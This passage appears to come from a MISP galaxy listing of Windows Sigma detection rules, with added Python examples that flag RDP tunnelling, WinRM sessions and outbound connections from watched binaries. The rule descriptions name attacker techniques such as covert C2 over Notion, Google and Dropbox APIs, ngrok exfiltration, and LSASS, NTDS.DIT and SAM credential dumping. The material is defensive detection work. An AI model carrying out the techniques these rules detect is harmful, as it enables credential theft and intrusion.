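    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def initiated(ev) -> bool:
    return str(ev.get("Initiated", "")).lower() == "true"

def port(ev, field: str) -> int:
    try:
        return int(ev.get(field, 0))
    except (TypeError, ValueError):
        return 0

def is_loopback(address: str) -> bool:
    try:
        return ipaddress.ip_address(address).is_loopback
    except ValueError:
        return False

def remote_powershell(ev) -> bool:
    """Outbound to WinRM (5985/5986) from any account but Network Service."""
    return (initiated(ev)
            and port(ev, "DestinationPort") in (5985, 5986)
            and ev.get("User", "").upper() not in NETWORK_SERVICE_NAMES)

def rdp_reverse_tunnel(ev) -> bool:
    """svchost talking to the loopback address with 3389 on either end."""
    return (image_basename(ev.get("Image", "")) == "svchost.exe"
            and is_loopback(ev.get("DestinationIp", ""))
            and 3389 in (port(ev, "SourcePort"), port(ev, "DestinationPort")))

def rdp_to_http(ev) -> bool:
    """svchost with local port 3389 (assumed: the termsvcs listener) and a
    remote port of 80 or 443, i.e. RDP carried inside an HTTP(S) tunnel."""
    return (image_basename(ev.get("Image", "")) == "svchost.exe"
            and port(ev, "SourcePort") == 3389
            and port(ev, "DestinationPort") in (80, 443))

def rdp_non_standard_tool(ev) -> bool:
    """Outbound to 3389 from an image that is not a known RDP client."""
    return (initiated(ev)
            and port(ev, "DestinationPort") == 3389
            and image_basename(ev.get("Image", "")) not in KNOWN_RDP_CLIENTS)

RULES = [
    ("Potential Remote PowerShell Session Initiated", remote_powershell),
    ("RDP Over Reverse SSH Tunnel", rdp_reverse_tunnel),
    ("RDP to HTTP or HTTPS Target Ports", rdp_to_http),
    ("Outbound RDP Connections Over Non-Standard Tools", rdp_non_standard_tool),
]

def evaluate(events):
    """Return (event index, rule title) for every rule that fires."""
    return [(i, title) for i, ev in enumerate(events)
            for title, rule in RULES if rule(ev)]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\alice", "Initiated": "true", "SourcePort": 51000,
     "DestinationIp": "10.0.0.20", "DestinationPort": 5986},
    {"Image": r"C:\Windows\System32\svchost.exe",                # the WinRM service itself
     "User": r"NT AUTHORITY\NETWORK SERVICE", "Initiated": "true", "SourcePort": 51001,
     "DestinationIp": "10.0.0.21", "DestinationPort": 5985},
    {"Image": r"C:\Windows\System32\svchost.exe",                # termsvcs behind ssh -R
     "User": r"NT AUTHORITY\NETWORK SERVICE", "Initiated": "false", "SourcePort": 3389,
     "DestinationIp": "127.0.0.1", "DestinationPort": 50123},
    {"Image": r"C:\Windows\System32\svchost.exe",                # termsvcs over HTTPS
     "User": r"NT AUTHORITY\NETWORK SERVICE", "Initiated": "true", "SourcePort": 3389,
     "DestinationIp": "1.1.1.1", "DestinationPort": 443},
    {"Image": r"C:\Windows\System32\mstsc.exe", "User": r"CORP\alice",   # allowlisted client
     "Initiated": "true", "SourcePort": 51002,
     "DestinationIp": "10.0.0.30", "DestinationPort": 3389},
    {"Image": r"C:\Python311\python.exe", "User": r"CORP\alice",         # not an RDP client
     "Initiated": "true", "SourcePort": 51003,
     "DestinationIp": "10.0.0.30", "DestinationPort": 3389},
]
```

Running `evaluate(SAMPLE_EVENTS)` flags events 0, 2, 3 and 5 and stays silent on the WinRM service's own outbound connection and on mstsc.exe. The `NETWORK_SERVICE_NAMES` set is the practical fix for the "not-covered localization" false positive: an unlisted locale name turns the WinRM service's own traffic into an alert, so check the `User` field on a host of each language build before deploying.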

Potentially Suspicious Network Connection To Notion API

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

Internal MISP references

UUID 7e9cf7b6-e827-11ed-a05b-15959c120003 which can be used as unique global reference for Potentially Suspicious Network Connection To Notion API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/05/03
falsepositive ['Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.']
filename net_connection_win_notion_api_susp_communication.yml
level low
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']

Network Connection Initiated Via Notepad.EXE

Detects a network connection initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates network communication, except for example when printing documents.

Internal MISP references

UUID e81528db-fc02-45e8-8e98-4e84aba1f10b which can be used as unique global reference for Network Connection Initiated Via Notepad.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author EagleEye Team
creation_date 2020/05/14
falsepositive ['Printing documents via notepad might cause communication with the printer via port 9100 or similar.']
filename net_connection_win_notepad.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.defense_evasion', 'attack.t1055']

Suspicious Non-Browser Network Communication With Google API

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

Internal MISP references

UUID 7e9cf7b6-e827-11ed-a05b-0242ac120003 which can be used as unique global reference for Suspicious Non-Browser Network Communication With Google API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/05/01
falsepositive ['Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.']
filename net_connection_win_susp_google_api_non_browser_access.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']

Network Connection Initiated By IMEWDBLD.EXE

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

Internal MISP references

UUID 8d7e392e-9b28-49e1-831d-5949c6281228 which can be used as unique global reference for Network Connection Initiated By IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename net_connection_win_imewdbld.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Network Connection Initiated To Mega.nz

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers have been seen abusing file sharing websites such as "mega.nz" to upload/download additional payloads.

Internal MISP references

UUID fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4 which can be used as unique global reference for Network Connection Initiated To Mega.nz in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/06
falsepositive ['Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.']
filename net_connection_win_domain_mega_nz.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']

Dllhost.EXE Initiated Network Connection To Non-Local IP Address

Detects dllhost initiating a network connection to a non-local IP address. Microsoft's own IP ranges need to be excluded, and the network communication dllhost generates depends entirely on the hosted DLL. An initial baseline is recommended before deployment.

Internal MISP references

UUID cfed2f44-16df-4bf3-833a-79405198b277 which can be used as unique global reference for Dllhost.EXE Initiated Network Connection To Non-Local IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bartblaze
creation_date 2020/07/13
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_dllhost_non_local_ip.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution', 'attack.t1559.001']
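
The Winlogon, Rundll32, Sync Center, Office non-local IP and Dllhost rules above share one test: a watched image initiating a connection to an address outside private and corporate space. The Python below is an added illustration of that test and is not the rules' own detection logic nor code from the Sigma project or MISP. It runs over constructed Sysmon Event ID 3 style records; the image-to-rule mapping, the corporate public range and the sample events are assumptions made for this example.

```python
# Added example (not the Sigma rules themselves): the "non-local IP" family of
# rules above as one test over Sysmon Event ID 3 style records. Field names
# follow Sysmon; the image-to-rule mapping and the corporate range are assumed.
import ipaddress

# Rule title per watched image name, taken from the descriptions above.
WATCHED_IMAGES = {
    "winlogon.exe": "Outbound Network Connection To Public IP Via Winlogon",
    "rundll32.exe": "Rundll32 Internet Connection",
    "mobsync.exe": "Microsoft Sync Center Suspicious Network Connections",
    "dllhost.exe": "Dllhost.EXE Initiated Network Connection To Non-Local IP Address",
    "winword.exe": "Office Application Initiated Network Connection To Non-Local IP",
    "excel.exe": "Office Application Initiated Network Connection To Non-Local IP",
    "powerpnt.exe": "Office Application Initiated Network Connection To Non-Local IP",
}

# Public ranges the organisation itself uses (the "corporate systems that use IP
# addresses from public address spaces" false positive). Constructed value;
# the Microsoft ranges the Dllhost rule mentions would go in the same list.
CORPORATE_PUBLIC_RANGES = [ipaddress.ip_network("93.184.216.0/24")]

def is_non_local(address: str) -> bool:
    """True when the destination is a routable public address outside the
    organisation's own public ranges. ip.is_global already rejects RFC 1918
    space, loopback, link-local, CGNAT (100.64.0.0/10) and the documentation
    ranges, so it is safer than a hand-written RFC 1918 check; multicast is
    rejected separately because is_global does not cover it."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False  # hostnames or malformed values are not this rule's concern
    if not ip.is_global or ip.is_multicast:
        return False
    return not any(ip in net for net in CORPORATE_PUBLIC_RANGES)

def image_basename(image: str) -> str:
    """Sysmon's Image is a full path; the rules match on the trailing file name."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(events):
    """Return (rule title, image, destination) for every matching event."""
    hits = []
    for ev in events:
        if str(ev.get("Initiated", "")).lower() != "true":
            continue  # every rule in this family looks at outbound connections only
        image = image_basename(ev.get("Image", ""))
        title = WATCHED_IMAGES.get(image)
        if title and is_non_local(ev.get("DestinationIp", "")):
            hits.append((title, image, ev["DestinationIp"]))
    return hits

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\winlogon.exe", "Initiated": "true",
     "DestinationIp": "1.1.1.1", "DestinationPort": 443},
    {"Image": r"C:\Windows\System32\winlogon.exe", "Initiated": "true",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},            # RFC 1918
    {"Image": r"C:\Windows\System32\rundll32.exe", "Initiated": "true",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},       # corporate range
    {"Image": r"C:\Windows\System32\dllhost.exe", "Initiated": "true",
     "DestinationIp": "100.64.1.2", "DestinationPort": 443},          # CGNAT, not global
    {"Image": r"C:\Windows\System32\mobsync.exe", "Initiated": "true",
     "DestinationIp": "239.255.255.250", "DestinationPort": 1900},    # multicast (SSDP)
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Initiated": "true", "DestinationIp": "8.8.8.8", "DestinationPort": 443},
    {"Image": r"C:\Windows\System32\winlogon.exe", "Initiated": "false",
     "DestinationIp": "8.8.8.8", "DestinationPort": 443},             # inbound, ignored
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Initiated": "true", "DestinationIp": "1.1.1.1", "DestinationPort": 443},  # not watched
]

if __name__ == "__main__":
    for title, image, destination in evaluate(SAMPLE_EVENTS):
        print(f"{title}: {image} -> {destination}")
```

On the sample data only the winlogon.exe and EXCEL.EXE connections to genuinely global addresses fire. Note that `is_global` is deliberately stricter than "not RFC 1918": the documentation prefixes (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) and 100.64.0.0/10 are not global either, so test data built from those ranges will never trigger this check.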

Cmstp Making Network Connection

Detects a suspicious network connection made by cmstp.exe.

Internal MISP references

UUID efafe0bf-4238-479e-af8f-797bd3490d2d which can be used as unique global reference for Cmstp Making Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unknown']
filename net_connection_win_susp_cmstp.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003']

Equation Editor Network Connection

Detects network connections from Equation Editor.

Internal MISP references

UUID a66bc059-c370-472c-a0d7-f8fd1bf9d583 which can be used as unique global reference for Equation Editor Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/14
falsepositive ['Unlikely']
filename net_connection_win_eqnedt.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1203']

Potentially Suspicious Malware Callback Communication

Detects programs that connect to known malware callback ports, based on statistical analysis from two different sandbox system databases.

Internal MISP references

UUID 4b89abaa-99fe-4232-afdd-8f9aa4d20382 which can be used as unique global reference for Potentially Suspicious Malware Callback Communication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_malware_callback_port.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1571']
Related clusters

To see the related clusters, click here.

Suspicious Network Connection to IP Lookup Service APIs

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of post-compromise internet connectivity testing.

Internal MISP references

UUID edf3485d-dac4-4d50-90e4-b0e5813f7e60 which can be used as unique global reference for Suspicious Network Connection to IP Lookup Service APIs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/24
falsepositive ['Legitimate use of the external websites for troubleshooting or network monitoring']
filename net_connection_win_susp_external_ip_lookup.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Communication To Ngrok Tunneling Service Initiated

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using "ngrok" to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional payload download.

Internal MISP references

UUID 1d08ac94-400d-4469-a82f-daee9a908849 which can be used as unique global reference for Communication To Ngrok Tunneling Service Initiated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/03
falsepositive ['Legitimate use of the ngrok service.']
filename net_connection_win_domain_ngrok_tunnel.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.command_and_control', 'attack.t1567', 'attack.t1568.002', 'attack.t1572', 'attack.t1090', 'attack.t1102', 'attack.s0508']
Related clusters

To see the related clusters, click here.

Suspicious Dropbox API Usage

Detects an executable that is not Dropbox itself but communicates with the Dropbox API

Internal MISP references

UUID 25eabf56-22f0-4915-a1ed-056b8dae0a68 which can be used as unique global reference for Suspicious Dropbox API Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/20
falsepositive ["Legitimate use of the API with a tool that the author wasn't aware of"]
filename net_connection_win_susp_dropbox_api.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Process Initiated Network Connection To Ngrok Domain

Detects an executable initiating a network connection to "ngrok" domains. Attackers have been seen using "ngrok" to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional payload download.

Internal MISP references

UUID 18249279-932f-45e2-b37a-8925f2597670 which can be used as unique global reference for Process Initiated Network Connection To Ngrok Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/16
falsepositive ['Legitimate use of the ngrok service.']
filename net_connection_win_domain_ngrok.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']
Related clusters

To see the related clusters, click here.

Potential Dead Drop Resolvers

Detects an executable that is not an internet browser or a known application initiating network connections to legitimate popular websites that have been used as dead drop resolvers in previous attacks. In this context, attackers leverage well-known websites such as "facebook", "youtube", etc. in order to pass through undetected.

Internal MISP references

UUID 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7 which can be used as unique global reference for Potential Dead Drop Resolvers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sorina Ionescu, X__Junior (Nextron Systems)
creation_date 2022/08/17
falsepositive ["One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.", 'Ninite contacting githubusercontent.com']
filename net_connection_win_susp_dead_drop_resolvers.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1102.001']
Related clusters

To see the related clusters, click here.

Microsoft Binary Suspicious Communication Endpoint

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

Internal MISP references

UUID e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 which can be used as unique global reference for Microsoft Binary Suspicious Communication Endpoint in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/08/30
falsepositive ['Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.']
filename net_connection_win_susp_file_sharing_domains_susp_folders.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Privilege Escalation Attempt Via .Exe.Local Technique

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

Internal MISP references

UUID 07a99744-56ac-40d2-97b7-2095967b0e03 which can be used as unique global reference for Potential Privilege Escalation Attempt Via .Exe.Local Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
creation_date 2022/12/16
falsepositive ['Unknown']
filename file_event_win_system32_local_folder_privilege_escalation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation']

Self Extraction Directive File Created In Potentially Suspicious Location

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

Internal MISP references

UUID 760e75d8-c3b5-409b-a9bf-6130b4c4603f which can be used as unique global reference for Self Extraction Directive File Created In Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/02/05
falsepositive ['Unknown']
filename file_event_win_sed_file_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

LSASS Process Memory Dump Files

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

Internal MISP references

UUID a5a2d357-1ab8-4675-a967-ef9990a59391 which can be used as unique global reference for LSASS Process Memory Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/15
falsepositive ['Unknown']
filename file_event_win_lsass_default_dump_file_names.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

VHD Image Download Via Browser

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

Internal MISP references

UUID 8468111a-ef07-4654-903b-b863a80bbc95 which can be used as unique global reference for VHD Image Download Via Browser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/10/25
falsepositive ['Legitimate downloads of ".vhd" files would also trigger this']
filename file_event_win_vhd_download_via_browsers.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

Internal MISP references

UUID 059c5af9-5131-4d8d-92b2-de4ad6146712 which can be used as unique global reference for LiveKD Driver Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter']
filename file_event_win_sysinternals_livekd_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

NTDS.DIT Creation By Uncommon Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

Internal MISP references

UUID 11b1ed55-154d-4e82-8ad7-83739298f720 which can be used as unique global reference for NTDS.DIT Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Typical HiveNightmare SAM File Export

Detects files written by the different tools that exploit HiveNightmare

Internal MISP references

UUID 6ea858a8-ba71-4a12-b2cc-5d83312404c7 which can be used as unique global reference for Typical HiveNightmare SAM File Export in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/23
falsepositive ['Files that accidentally contain these strings']
filename file_event_win_hktl_hivenightmare_file_exports.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'cve.2021.36934']
Related clusters

To see the related clusters, click here.

PowerShell Module File Created

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

Internal MISP references

UUID e36941d0-c0f0-443f-bc6f-cb2952eb69ea which can be used as unique global reference for PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Likely']
filename file_event_win_powershell_module_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Suspicious Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 117d3d3a-755c-4a61-b23e-9171146d094c which can be used as unique global reference for Suspicious Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unlikely']
filename file_event_win_office_outlook_susp_macro_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

Internal MISP references

UUID 3215aa19-f060-4332-86d5-5602511f3ca8 which can be used as unique global reference for Suspicious LNK Double Extension File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/11/07
falsepositive ['Some tuning is required for other general purpose directories of third party apps']
filename file_event_win_susp_lnk_double_extension.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Suspicious Creation TXT File in User Desktop

Detects ransomware creating a txt file on the user's Desktop

Internal MISP references

UUID caf02a0a-1e1c-4552-9b48-5e070bd88d11 which can be used as unique global reference for Suspicious Creation TXT File in User Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename file_event_win_susp_desktop_txt.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

NPPSpy Hacktool Usage

Detects the use of the NPPSpy hacktool, which stores the cleartext passwords of users who logged in to a local file

Internal MISP references

UUID cad1fe90-2406-44dc-bd03-59d0b58fe722 which can be used as unique global reference for NPPSpy Hacktool Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/29
falsepositive ['Unknown']
filename file_event_win_hktl_nppspy.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access']

Creation of a Diagcab

Detects the creation of a diagcab file, which could be caused by a legitimate installer or be a sign of exploitation (review the filename and its location)

Internal MISP references

UUID 3d0ed417-3d94-4963-a562-4a92c940656a which can be used as unique global reference for Creation of a Diagcab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/08
falsepositive ['Legitimate microsoft diagcab']
filename file_event_win_susp_diagcab.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource_development']

VsCode Powershell Profile Modification

Detects the creation or modification of a VSCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence

Internal MISP references

UUID 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502 which can be used as unique global reference for VsCode Powershell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Legitimate use of the profile by developers or administrators']
filename file_event_win_susp_vscode_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Suspicious PROCEXP152.sys File Created In TMP

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

Internal MISP references

UUID 3da70954-0f2c-4103-adff-b7440368f50e which can be used as unique global reference for Suspicious PROCEXP152.sys File Created In TMP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ["Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."]
filename file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1562.001', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

OneNote Attachment File Dropped In Suspicious Location

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

Internal MISP references

UUID 7fd164ba-126a-4d9c-9392-0d4f7c243df0 which can be used as unique global reference for OneNote Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of ".one" or ".onepkg" files from those locations']
filename file_event_win_office_onenote_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Suspicious File Created Via OneNote Application

Detects suspicious files created via the OneNote application. This could indicate that a potentially malicious ".one"/".onepkg" file was executed, as seen in malware activity in the wild

Internal MISP references

UUID fcc6d700-68d9-4241-9a1a-06874d621b06 which can be used as unique global reference for Suspicious File Created Via OneNote Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/09
falsepositive ["False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", 'Occasional FPs might occur if OneNote is used internally to share different embedded documents']
filename file_event_win_office_onenote_susp_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

NTDS.DIT Creation By Uncommon Parent Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

Internal MISP references

UUID 4e7050dd-e548-483f-b7d6-527ab4fa784d which can be used as unique global reference for NTDS.DIT Creation By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_parent_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

ADSI-Cache File Creation By Uncommon Tool

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

Internal MISP references

UUID 75bf09fa-1dd7-4d18-9af9-dd9e492562eb which can be used as unique global reference for ADSI-Cache File Creation By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec, Tim Shelton
creation_date 2019/03/24
falsepositive ['Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.']
filename file_event_win_adsi_cache_creation_by_uncommon_tool.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1001.003', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

PSEXEC Remote Execution File Artefact

Detects the creation of the PsExec key file, which is created any time a PsExec command is executed. It is written to the file system and will be recorded in the USN Journal on the target system

Internal MISP references

UUID 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 which can be used as unique global reference for PSEXEC Remote Execution File Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/21
falsepositive ['Unlikely']
filename file_event_win_sysinternals_psexec_service_key.yml
level high
logsource.category file_event
